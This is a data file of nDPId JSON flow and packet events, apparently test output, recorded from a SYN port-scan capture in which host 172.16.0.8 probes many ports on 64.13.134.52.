-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAszy0AACkGUEWsEAAIQA2GNIzSG1ndUoMYAAAAAGACCAAVNgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsh1cAADAGkRusEAAIQA2GNIzSEWHdUoMYAAAAAGACBAAjLgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswFUAACcGYR2sEAAIQA2GNIzS1DjdUoMYAAAAAGACEABUVgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACoGCumsEAAIQA2GNIzSAFPdUoMYAAAAAGACDAAsPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SUAACkGQk2sEAAIQA2GNIzSBR3dUoMYAAAAAGACCAArcgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsDlsAADMGBxisEAAIQA2GNIzSH0ndUoMYAAAAAGACEAAJRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAswGIAADAGWBCsEAAIQA2GNIzSEPfdUoMYAAAAAGACBAAjmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059456,"pkt":"ACYLMQczACWzv5HuCABFAAAsercAADEGnLusEAAIQA2GNIzSI1rdUoMYAAAAAGACCAANNQAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1278275059462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059462,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstMUAACUGbq2sEAAIQA2GNIzSD0HdUoMYAAAAAGACCAAhTgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsfagAAC8Gm8qsEAAIQA2GNIzSHcndUoMYAAAAAGACEAAKxgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsrK8AADQGZ8OsEAAIQA2GNIzSJxTdUoMYAAAAAGACBAANewAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsLFMAADMG6R+sEAAIQA2GNIzSGnvdUoMYAAAAAGACEAAOFAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3gAADkG+\/qsEAAIQA2GNIzSF2\/dUoMYAAAAAGACCAAZIAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsscoAACYGcKisEAAIQA2GNIzSFrLdUoMYAAAAAGACDAAV3QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsQukAACYG34msEAAIQA2GNIzSI43dUoMYAAAAAGACDAAJAgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GYAADIGKgysEAAIQA2GNIzSAu3dUoMYAAAAAGACDAApogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstAUAADoGWm2sEAAIQA2GNIzSBRXdUoMYAAAAAGACDAAnegAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs55oAADAGMNisEAAIQA2GNIzSH0LdUoMYAAAAAGACBAAVTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsdFgAADoGmhqsEAAIQA2GNIzSH6PdUoMYAAAAAGACDAAM7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAswkMAADQGUi+sEAAIQA2GNIzSC9bdUoMYAAAAAGACBAAouQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsixEAADEGjGGsEAAIQA2GNIzSBAfdUoMYAAAAAGACCAAsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsfV4AADkGkhSsEAAIQA2GNIzSCADdUoMYAAAAAGACCAAojwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsleYAAC8Gg4ysEAAIQA2GNIzSGZPdUoMYAAAAAGACEAAO\/AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRgAADgGm1qsEAAIQA2GNIzTBAzdU4MZAAAAAGACBAAwgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
